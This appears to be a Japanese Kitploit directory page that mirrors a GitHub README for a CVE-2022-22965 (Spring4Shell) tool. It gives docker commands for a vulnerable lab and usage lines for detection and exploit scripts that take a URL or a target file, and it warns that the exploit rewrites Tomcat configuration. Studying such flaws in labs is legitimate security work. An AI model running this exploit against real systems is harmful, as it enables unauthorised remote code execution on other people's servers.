Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-22965 — Spring-0day/CVE-2022-22965 | Kitploit
ツール/GitHubGitHub/nu0l/cve-2022-22965
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubnu0l/cve-2022-22965

CVE-2022-22965

Spring-0day/CVE-2022-22965

リポジトリを見る
434年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-22965

Spring Framework/CVE-2022-22965

脆弱性ID: CVE-2022-22965/CNVD-2022-23942/QVD-2022-1691

脆弱性の再現

root@kitploit:~
docker pull vulfocus/spring-core-rce-2022-03-29
docker run -dit -p 8080:8080 vulfocus/spring-core-rce-2022-03-29

image

脆弱性の検出

POC

ターゲットの検出にはPOCの使用をお勧めします。その利点は、DNSLOGに基づいて脆弱性が存在するかどうかを検証でき、tomcatのログ設定を変更しないことです。

root@kitploit:~
python3 cve-2022-22965-poc.py -url https://example.com/
python3 cve-2022-22965-poc.py -file file.txt

image

EXP

root@kitploit:~
python3 cve-2022-22965.py -url https://example.com/
python3 cve-2022-22965.py -file file.txt

image

エクスプロイト

POC

root@kitploit:~
python3 cve-2022-22965-poc.py -url https://example.com/

image

EXP

root@kitploit:~
python3 cve-2022-22965.py -url http://example.com/

image

ファジング

POC

13行目に一般的なルートを追加してください

root@kitploit:~
routs = ['env',]
EXPファジング

12行目に一般的なパスを追加してください

root@kitploit:~
path = ['root',]
  • 警告:*
  • このEXPは、失敗したHTTPリクエストをまとめてファイルに書き込みます。
  • このEXPは、tomcatの設定を変更します。

image

安全な学習専用です。不正に使用しないでください

仅用安全学习,请勿非法使用

ツールをダウンロード